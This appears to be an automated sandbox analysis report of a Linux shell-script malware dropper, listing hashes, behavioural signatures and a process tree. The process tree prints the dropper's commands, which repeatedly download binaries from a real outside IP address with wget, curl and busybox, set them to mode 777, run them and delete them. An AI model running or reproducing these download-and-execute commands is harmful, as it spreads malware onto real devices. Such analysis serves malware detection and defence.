Analysis
-
max time kernel
63s -
max time network
68s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
21/10/2024, 01:56
Static task
static1
Behavioral task
behavioral1
Sample
f571373dccb338c0b29c7990e8b1ad82ccd516d02810ace9460d1dbd3164c9cf.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
f571373dccb338c0b29c7990e8b1ad82ccd516d02810ace9460d1dbd3164c9cf.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
f571373dccb338c0b29c7990e8b1ad82ccd516d02810ace9460d1dbd3164c9cf.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
f571373dccb338c0b29c7990e8b1ad82ccd516d02810ace9460d1dbd3164c9cf.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
f571373dccb338c0b29c7990e8b1ad82ccd516d02810ace9460d1dbd3164c9cf.sh
-
Size
10KB
-
MD5
f0a8094e821bcfdb0f09881b495662fd
-
SHA1
91d855d26fac92dc860381054eda44606e87ed1a
-
SHA256
f571373dccb338c0b29c7990e8b1ad82ccd516d02810ace9460d1dbd3164c9cf
-
SHA512
74d3d741e88a019f01671d04c0b0f0778c7c91ea6afb58d09106195c434d5c6428dbd5bbce1d0a6cc2e750c344e17df28e95c106244b6ba866cb99029af0aa8f
-
SSDEEP
192:xoHyiHKWYCNJfjFgQfo0MEFFYJSijNJftgQfo0wFFYJ3iyiHKWa:xo885gQfo0MEFFYJSiFgQfo0wFFYJ3T
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 25 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 693 chmod 746 chmod 759 chmod 827 chmod 864 chmod 896 chmod 920 chmod 733 chmod 856 chmod 876 chmod 902 chmod 926 chmod 701 chmod 774 chmod 784 chmod 838 chmod 844 chmod 888 chmod 908 chmod 914 chmod 719 chmod 792 chmod 850 chmod 870 chmod 882 chmod -
Executes dropped EXE 25 IoCs
ioc pid Process /tmp/0w6Xw42OWClMI6tqEWNIRX0twXp6LS1bVK 694 0w6Xw42OWClMI6tqEWNIRX0twXp6LS1bVK /tmp/RxOHWJFgUEyrZWVU6gkJBJs9ThXN24DjZo 702 RxOHWJFgUEyrZWVU6gkJBJs9ThXN24DjZo /tmp/7go70Vx0Jy1EB6qW8YD4IPgDEYlw2mDYm6 720 7go70Vx0Jy1EB6qW8YD4IPgDEYlw2mDYm6 /tmp/oBQOkJVarQtrrvsgoAax0BwuWUzVLq6BlK 734 oBQOkJVarQtrrvsgoAax0BwuWUzVLq6BlK /tmp/3D4TYTodiGBymv9iv1KWoyRU90x1ljhWha 747 3D4TYTodiGBymv9iv1KWoyRU90x1ljhWha /tmp/wJcz1jyZOjDsozyd5IS38hIDZDj7Uh1OCP 761 wJcz1jyZOjDsozyd5IS38hIDZDj7Uh1OCP /tmp/mlVsRfiQX7rESrWQ13qgTPgMvaPQ2prV23 775 mlVsRfiQX7rESrWQ13qgTPgMvaPQ2prV23 /tmp/xq8aFDJgDJkwbAhAyStEswTR42A2FQCCtR 785 xq8aFDJgDJkwbAhAyStEswTR42A2FQCCtR /tmp/Ji3DTo5mTNUErszSArM1M0npAfRlmGM1is 794 Ji3DTo5mTNUErszSArM1M0npAfRlmGM1is /tmp/R5SBHGhZ2d85MmRLaaxc9Qiv9EjeNatL6C 829 R5SBHGhZ2d85MmRLaaxc9Qiv9EjeNatL6C /tmp/RST5ihgvCHq053iGjxnCyKylug69j9npai 839 RST5ihgvCHq053iGjxnCyKylug69j9npai /tmp/v7uTmFOL4HT74EjAK3fgGzkI0RDsbTenkN 845 v7uTmFOL4HT74EjAK3fgGzkI0RDsbTenkN /tmp/mOZslaPet6PwQG4et9BWCpbfJtqLmkSomF 851 mOZslaPet6PwQG4et9BWCpbfJtqLmkSomF /tmp/R9h1DWV4s6z4Of7Wsonc16J1aGCFZj6BFk 857 R9h1DWV4s6z4Of7Wsonc16J1aGCFZj6BFk /tmp/mlVsRfiQX7rESrWQ13qgTPgMvaPQ2prV23 865 mlVsRfiQX7rESrWQ13qgTPgMvaPQ2prV23 /tmp/xq8aFDJgDJkwbAhAyStEswTR42A2FQCCtR 871 xq8aFDJgDJkwbAhAyStEswTR42A2FQCCtR /tmp/Ji3DTo5mTNUErszSArM1M0npAfRlmGM1is 877 Ji3DTo5mTNUErszSArM1M0npAfRlmGM1is /tmp/R5SBHGhZ2d85MmRLaaxc9Qiv9EjeNatL6C 883 R5SBHGhZ2d85MmRLaaxc9Qiv9EjeNatL6C /tmp/wJcz1jyZOjDsozyd5IS38hIDZDj7Uh1OCP 889 wJcz1jyZOjDsozyd5IS38hIDZDj7Uh1OCP /tmp/v7uTmFOL4HT74EjAK3fgGzkI0RDsbTenkN 897 v7uTmFOL4HT74EjAK3fgGzkI0RDsbTenkN /tmp/mOZslaPet6PwQG4et9BWCpbfJtqLmkSomF 903 mOZslaPet6PwQG4et9BWCpbfJtqLmkSomF /tmp/R9h1DWV4s6z4Of7Wsonc16J1aGCFZj6BFk 909 R9h1DWV4s6z4Of7Wsonc16J1aGCFZj6BFk /tmp/RST5ihgvCHq053iGjxnCyKylug69j9npai 915 RST5ihgvCHq053iGjxnCyKylug69j9npai /tmp/RxOHWJFgUEyrZWVU6gkJBJs9ThXN24DjZo 921 RxOHWJFgUEyrZWVU6gkJBJs9ThXN24DjZo /tmp/7go70Vx0Jy1EB6qW8YD4IPgDEYlw2mDYm6 927 7go70Vx0Jy1EB6qW8YD4IPgDEYlw2mDYm6 -
Checks CPU configuration 1 TTPs 25 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
description ioc Process File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl -
System Network Configuration Discovery 1 TTPs 10 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 924 curl 925 busybox 704 wget 707 curl 720 7go70Vx0Jy1EB6qW8YD4IPgDEYlw2mDYm6 721 rm 923 wget 710 busybox 927 7go70Vx0Jy1EB6qW8YD4IPgDEYlw2mDYm6 928 rm -
Writes file to tmp directory 25 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/xq8aFDJgDJkwbAhAyStEswTR42A2FQCCtR curl File opened for modification /tmp/Ji3DTo5mTNUErszSArM1M0npAfRlmGM1is curl File opened for modification /tmp/RST5ihgvCHq053iGjxnCyKylug69j9npai curl File opened for modification /tmp/wJcz1jyZOjDsozyd5IS38hIDZDj7Uh1OCP curl File opened for modification /tmp/v7uTmFOL4HT74EjAK3fgGzkI0RDsbTenkN curl File opened for modification /tmp/RxOHWJFgUEyrZWVU6gkJBJs9ThXN24DjZo curl File opened for modification /tmp/RxOHWJFgUEyrZWVU6gkJBJs9ThXN24DjZo curl File opened for modification /tmp/7go70Vx0Jy1EB6qW8YD4IPgDEYlw2mDYm6 curl File opened for modification /tmp/oBQOkJVarQtrrvsgoAax0BwuWUzVLq6BlK curl File opened for modification /tmp/R5SBHGhZ2d85MmRLaaxc9Qiv9EjeNatL6C curl File opened for modification /tmp/v7uTmFOL4HT74EjAK3fgGzkI0RDsbTenkN curl File opened for modification /tmp/mOZslaPet6PwQG4et9BWCpbfJtqLmkSomF curl File opened for modification /tmp/mlVsRfiQX7rESrWQ13qgTPgMvaPQ2prV23 curl File opened for modification /tmp/xq8aFDJgDJkwbAhAyStEswTR42A2FQCCtR curl File opened for modification /tmp/0w6Xw42OWClMI6tqEWNIRX0twXp6LS1bVK curl File opened for modification /tmp/7go70Vx0Jy1EB6qW8YD4IPgDEYlw2mDYm6 curl File opened for modification /tmp/R9h1DWV4s6z4Of7Wsonc16J1aGCFZj6BFk curl File opened for modification /tmp/R9h1DWV4s6z4Of7Wsonc16J1aGCFZj6BFk curl File opened for modification /tmp/3D4TYTodiGBymv9iv1KWoyRU90x1ljhWha curl File opened for modification /tmp/mlVsRfiQX7rESrWQ13qgTPgMvaPQ2prV23 curl File opened for modification /tmp/Ji3DTo5mTNUErszSArM1M0npAfRlmGM1is curl File opened for modification /tmp/R5SBHGhZ2d85MmRLaaxc9Qiv9EjeNatL6C curl File opened for modification /tmp/mOZslaPet6PwQG4et9BWCpbfJtqLmkSomF curl File opened for modification /tmp/RST5ihgvCHq053iGjxnCyKylug69j9npai curl File opened for modification /tmp/wJcz1jyZOjDsozyd5IS38hIDZDj7Uh1OCP curl
Processes
-
/tmp/f571373dccb338c0b29c7990e8b1ad82ccd516d02810ace9460d1dbd3164c9cf.sh/tmp/f571373dccb338c0b29c7990e8b1ad82ccd516d02810ace9460d1dbd3164c9cf.sh1⤵PID:662
-
/bin/rm/bin/rm bins.sh2⤵PID:665
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/0w6Xw42OWClMI6tqEWNIRX0twXp6LS1bVK2⤵PID:671
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/0w6Xw42OWClMI6tqEWNIRX0twXp6LS1bVK2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:687
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/0w6Xw42OWClMI6tqEWNIRX0twXp6LS1bVK2⤵PID:691
-
-
/bin/chmodchmod 777 0w6Xw42OWClMI6tqEWNIRX0twXp6LS1bVK2⤵
- File and Directory Permissions Modification
PID:693
-
-
/tmp/0w6Xw42OWClMI6tqEWNIRX0twXp6LS1bVK./0w6Xw42OWClMI6tqEWNIRX0twXp6LS1bVK2⤵
- Executes dropped EXE
PID:694
-
-
/bin/rmrm 0w6Xw42OWClMI6tqEWNIRX0twXp6LS1bVK2⤵PID:695
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/RxOHWJFgUEyrZWVU6gkJBJs9ThXN24DjZo2⤵PID:697
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/RxOHWJFgUEyrZWVU6gkJBJs9ThXN24DjZo2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:699
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/RxOHWJFgUEyrZWVU6gkJBJs9ThXN24DjZo2⤵PID:700
-
-
/bin/chmodchmod 777 RxOHWJFgUEyrZWVU6gkJBJs9ThXN24DjZo2⤵
- File and Directory Permissions Modification
PID:701
-
-
/tmp/RxOHWJFgUEyrZWVU6gkJBJs9ThXN24DjZo./RxOHWJFgUEyrZWVU6gkJBJs9ThXN24DjZo2⤵
- Executes dropped EXE
PID:702
-
-
/bin/rmrm RxOHWJFgUEyrZWVU6gkJBJs9ThXN24DjZo2⤵PID:703
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/7go70Vx0Jy1EB6qW8YD4IPgDEYlw2mDYm62⤵
- System Network Configuration Discovery
PID:704
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/7go70Vx0Jy1EB6qW8YD4IPgDEYlw2mDYm62⤵
- Checks CPU configuration
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:707
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/7go70Vx0Jy1EB6qW8YD4IPgDEYlw2mDYm62⤵
- System Network Configuration Discovery
PID:710
-
-
/bin/chmodchmod 777 7go70Vx0Jy1EB6qW8YD4IPgDEYlw2mDYm62⤵
- File and Directory Permissions Modification
PID:719
-
-
/tmp/7go70Vx0Jy1EB6qW8YD4IPgDEYlw2mDYm6./7go70Vx0Jy1EB6qW8YD4IPgDEYlw2mDYm62⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:720
-
-
/bin/rmrm 7go70Vx0Jy1EB6qW8YD4IPgDEYlw2mDYm62⤵
- System Network Configuration Discovery
PID:721
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/oBQOkJVarQtrrvsgoAax0BwuWUzVLq6BlK2⤵PID:722
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/oBQOkJVarQtrrvsgoAax0BwuWUzVLq6BlK2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:725
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/oBQOkJVarQtrrvsgoAax0BwuWUzVLq6BlK2⤵PID:729
-
-
/bin/chmodchmod 777 oBQOkJVarQtrrvsgoAax0BwuWUzVLq6BlK2⤵
- File and Directory Permissions Modification
PID:733
-
-
/tmp/oBQOkJVarQtrrvsgoAax0BwuWUzVLq6BlK./oBQOkJVarQtrrvsgoAax0BwuWUzVLq6BlK2⤵
- Executes dropped EXE
PID:734
-
-
/bin/rmrm oBQOkJVarQtrrvsgoAax0BwuWUzVLq6BlK2⤵PID:735
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/3D4TYTodiGBymv9iv1KWoyRU90x1ljhWha2⤵PID:736
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/3D4TYTodiGBymv9iv1KWoyRU90x1ljhWha2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:740
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/3D4TYTodiGBymv9iv1KWoyRU90x1ljhWha2⤵PID:744
-
-
/bin/chmodchmod 777 3D4TYTodiGBymv9iv1KWoyRU90x1ljhWha2⤵
- File and Directory Permissions Modification
PID:746
-
-
/tmp/3D4TYTodiGBymv9iv1KWoyRU90x1ljhWha./3D4TYTodiGBymv9iv1KWoyRU90x1ljhWha2⤵
- Executes dropped EXE
PID:747
-
-
/bin/rmrm 3D4TYTodiGBymv9iv1KWoyRU90x1ljhWha2⤵PID:748
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/wJcz1jyZOjDsozyd5IS38hIDZDj7Uh1OCP2⤵PID:750
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/wJcz1jyZOjDsozyd5IS38hIDZDj7Uh1OCP2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:752
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/wJcz1jyZOjDsozyd5IS38hIDZDj7Uh1OCP2⤵PID:757
-
-
/bin/chmodchmod 777 wJcz1jyZOjDsozyd5IS38hIDZDj7Uh1OCP2⤵
- File and Directory Permissions Modification
PID:759
-
-
/tmp/wJcz1jyZOjDsozyd5IS38hIDZDj7Uh1OCP./wJcz1jyZOjDsozyd5IS38hIDZDj7Uh1OCP2⤵
- Executes dropped EXE
PID:761
-
-
/bin/rmrm wJcz1jyZOjDsozyd5IS38hIDZDj7Uh1OCP2⤵PID:762
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/mlVsRfiQX7rESrWQ13qgTPgMvaPQ2prV232⤵PID:763
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/mlVsRfiQX7rESrWQ13qgTPgMvaPQ2prV232⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:769
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/mlVsRfiQX7rESrWQ13qgTPgMvaPQ2prV232⤵PID:772
-
-
/bin/chmodchmod 777 mlVsRfiQX7rESrWQ13qgTPgMvaPQ2prV232⤵
- File and Directory Permissions Modification
PID:774
-
-
/tmp/mlVsRfiQX7rESrWQ13qgTPgMvaPQ2prV23./mlVsRfiQX7rESrWQ13qgTPgMvaPQ2prV232⤵
- Executes dropped EXE
PID:775
-
-
/bin/rmrm mlVsRfiQX7rESrWQ13qgTPgMvaPQ2prV232⤵PID:776
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/xq8aFDJgDJkwbAhAyStEswTR42A2FQCCtR2⤵PID:778
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/xq8aFDJgDJkwbAhAyStEswTR42A2FQCCtR2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:780
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/xq8aFDJgDJkwbAhAyStEswTR42A2FQCCtR2⤵PID:782
-
-
/bin/chmodchmod 777 xq8aFDJgDJkwbAhAyStEswTR42A2FQCCtR2⤵
- File and Directory Permissions Modification
PID:784
-
-
/tmp/xq8aFDJgDJkwbAhAyStEswTR42A2FQCCtR./xq8aFDJgDJkwbAhAyStEswTR42A2FQCCtR2⤵
- Executes dropped EXE
PID:785
-
-
/bin/rmrm xq8aFDJgDJkwbAhAyStEswTR42A2FQCCtR2⤵PID:786
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Ji3DTo5mTNUErszSArM1M0npAfRlmGM1is2⤵PID:787
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Ji3DTo5mTNUErszSArM1M0npAfRlmGM1is2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:788
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Ji3DTo5mTNUErszSArM1M0npAfRlmGM1is2⤵PID:791
-
-
/bin/chmodchmod 777 Ji3DTo5mTNUErszSArM1M0npAfRlmGM1is2⤵
- File and Directory Permissions Modification
PID:792
-
-
/tmp/Ji3DTo5mTNUErszSArM1M0npAfRlmGM1is./Ji3DTo5mTNUErszSArM1M0npAfRlmGM1is2⤵
- Executes dropped EXE
PID:794
-
-
/bin/rmrm Ji3DTo5mTNUErszSArM1M0npAfRlmGM1is2⤵PID:795
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/R5SBHGhZ2d85MmRLaaxc9Qiv9EjeNatL6C2⤵PID:796
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/R5SBHGhZ2d85MmRLaaxc9Qiv9EjeNatL6C2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:808
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/R5SBHGhZ2d85MmRLaaxc9Qiv9EjeNatL6C2⤵PID:825
-
-
/bin/chmodchmod 777 R5SBHGhZ2d85MmRLaaxc9Qiv9EjeNatL6C2⤵
- File and Directory Permissions Modification
PID:827
-
-
/tmp/R5SBHGhZ2d85MmRLaaxc9Qiv9EjeNatL6C./R5SBHGhZ2d85MmRLaaxc9Qiv9EjeNatL6C2⤵
- Executes dropped EXE
PID:829
-
-
/bin/rmrm R5SBHGhZ2d85MmRLaaxc9Qiv9EjeNatL6C2⤵PID:830
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/RST5ihgvCHq053iGjxnCyKylug69j9npai2⤵PID:831
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/RST5ihgvCHq053iGjxnCyKylug69j9npai2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:836
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/RST5ihgvCHq053iGjxnCyKylug69j9npai2⤵PID:837
-
-
/bin/chmodchmod 777 RST5ihgvCHq053iGjxnCyKylug69j9npai2⤵
- File and Directory Permissions Modification
PID:838
-
-
/tmp/RST5ihgvCHq053iGjxnCyKylug69j9npai./RST5ihgvCHq053iGjxnCyKylug69j9npai2⤵
- Executes dropped EXE
PID:839
-
-
/bin/rmrm RST5ihgvCHq053iGjxnCyKylug69j9npai2⤵PID:840
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/v7uTmFOL4HT74EjAK3fgGzkI0RDsbTenkN2⤵PID:841
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/v7uTmFOL4HT74EjAK3fgGzkI0RDsbTenkN2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:842
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/v7uTmFOL4HT74EjAK3fgGzkI0RDsbTenkN2⤵PID:843
-
-
/bin/chmodchmod 777 v7uTmFOL4HT74EjAK3fgGzkI0RDsbTenkN2⤵
- File and Directory Permissions Modification
PID:844
-
-
/tmp/v7uTmFOL4HT74EjAK3fgGzkI0RDsbTenkN./v7uTmFOL4HT74EjAK3fgGzkI0RDsbTenkN2⤵
- Executes dropped EXE
PID:845
-
-
/bin/rmrm v7uTmFOL4HT74EjAK3fgGzkI0RDsbTenkN2⤵PID:846
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/mOZslaPet6PwQG4et9BWCpbfJtqLmkSomF2⤵PID:847
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/mOZslaPet6PwQG4et9BWCpbfJtqLmkSomF2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:848
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/mOZslaPet6PwQG4et9BWCpbfJtqLmkSomF2⤵PID:849
-
-
/bin/chmodchmod 777 mOZslaPet6PwQG4et9BWCpbfJtqLmkSomF2⤵
- File and Directory Permissions Modification
PID:850
-
-
/tmp/mOZslaPet6PwQG4et9BWCpbfJtqLmkSomF./mOZslaPet6PwQG4et9BWCpbfJtqLmkSomF2⤵
- Executes dropped EXE
PID:851
-
-
/bin/rmrm mOZslaPet6PwQG4et9BWCpbfJtqLmkSomF2⤵PID:852
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/R9h1DWV4s6z4Of7Wsonc16J1aGCFZj6BFk2⤵PID:853
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/R9h1DWV4s6z4Of7Wsonc16J1aGCFZj6BFk2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:854
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/R9h1DWV4s6z4Of7Wsonc16J1aGCFZj6BFk2⤵PID:855
-
-
/bin/chmodchmod 777 R9h1DWV4s6z4Of7Wsonc16J1aGCFZj6BFk2⤵
- File and Directory Permissions Modification
PID:856
-
-
/tmp/R9h1DWV4s6z4Of7Wsonc16J1aGCFZj6BFk./R9h1DWV4s6z4Of7Wsonc16J1aGCFZj6BFk2⤵
- Executes dropped EXE
PID:857
-
-
/bin/rmrm R9h1DWV4s6z4Of7Wsonc16J1aGCFZj6BFk2⤵PID:858
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/mlVsRfiQX7rESrWQ13qgTPgMvaPQ2prV232⤵PID:859
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/mlVsRfiQX7rESrWQ13qgTPgMvaPQ2prV232⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:862
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/mlVsRfiQX7rESrWQ13qgTPgMvaPQ2prV232⤵PID:863
-
-
/bin/chmodchmod 777 mlVsRfiQX7rESrWQ13qgTPgMvaPQ2prV232⤵
- File and Directory Permissions Modification
PID:864
-
-
/tmp/mlVsRfiQX7rESrWQ13qgTPgMvaPQ2prV23./mlVsRfiQX7rESrWQ13qgTPgMvaPQ2prV232⤵
- Executes dropped EXE
PID:865
-
-
/bin/rmrm mlVsRfiQX7rESrWQ13qgTPgMvaPQ2prV232⤵PID:866
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/xq8aFDJgDJkwbAhAyStEswTR42A2FQCCtR2⤵PID:867
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/xq8aFDJgDJkwbAhAyStEswTR42A2FQCCtR2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:868
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/xq8aFDJgDJkwbAhAyStEswTR42A2FQCCtR2⤵PID:869
-
-
/bin/chmodchmod 777 xq8aFDJgDJkwbAhAyStEswTR42A2FQCCtR2⤵
- File and Directory Permissions Modification
PID:870
-
-
/tmp/xq8aFDJgDJkwbAhAyStEswTR42A2FQCCtR./xq8aFDJgDJkwbAhAyStEswTR42A2FQCCtR2⤵
- Executes dropped EXE
PID:871
-
-
/bin/rmrm xq8aFDJgDJkwbAhAyStEswTR42A2FQCCtR2⤵PID:872
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Ji3DTo5mTNUErszSArM1M0npAfRlmGM1is2⤵PID:873
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Ji3DTo5mTNUErszSArM1M0npAfRlmGM1is2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:874
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Ji3DTo5mTNUErszSArM1M0npAfRlmGM1is2⤵PID:875
-
-
/bin/chmodchmod 777 Ji3DTo5mTNUErszSArM1M0npAfRlmGM1is2⤵
- File and Directory Permissions Modification
PID:876
-
-
/tmp/Ji3DTo5mTNUErszSArM1M0npAfRlmGM1is./Ji3DTo5mTNUErszSArM1M0npAfRlmGM1is2⤵
- Executes dropped EXE
PID:877
-
-
/bin/rmrm Ji3DTo5mTNUErszSArM1M0npAfRlmGM1is2⤵PID:878
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/R5SBHGhZ2d85MmRLaaxc9Qiv9EjeNatL6C2⤵PID:879
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/R5SBHGhZ2d85MmRLaaxc9Qiv9EjeNatL6C2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:880
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/R5SBHGhZ2d85MmRLaaxc9Qiv9EjeNatL6C2⤵PID:881
-
-
/bin/chmodchmod 777 R5SBHGhZ2d85MmRLaaxc9Qiv9EjeNatL6C2⤵
- File and Directory Permissions Modification
PID:882
-
-
/tmp/R5SBHGhZ2d85MmRLaaxc9Qiv9EjeNatL6C./R5SBHGhZ2d85MmRLaaxc9Qiv9EjeNatL6C2⤵
- Executes dropped EXE
PID:883
-
-
/bin/rmrm R5SBHGhZ2d85MmRLaaxc9Qiv9EjeNatL6C2⤵PID:884
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/wJcz1jyZOjDsozyd5IS38hIDZDj7Uh1OCP2⤵PID:885
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/wJcz1jyZOjDsozyd5IS38hIDZDj7Uh1OCP2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:886
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/wJcz1jyZOjDsozyd5IS38hIDZDj7Uh1OCP2⤵PID:887
-
-
/bin/chmodchmod 777 wJcz1jyZOjDsozyd5IS38hIDZDj7Uh1OCP2⤵
- File and Directory Permissions Modification
PID:888
-
-
/tmp/wJcz1jyZOjDsozyd5IS38hIDZDj7Uh1OCP./wJcz1jyZOjDsozyd5IS38hIDZDj7Uh1OCP2⤵
- Executes dropped EXE
PID:889
-
-
/bin/rmrm wJcz1jyZOjDsozyd5IS38hIDZDj7Uh1OCP2⤵PID:890
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/v7uTmFOL4HT74EjAK3fgGzkI0RDsbTenkN2⤵PID:891
-
-
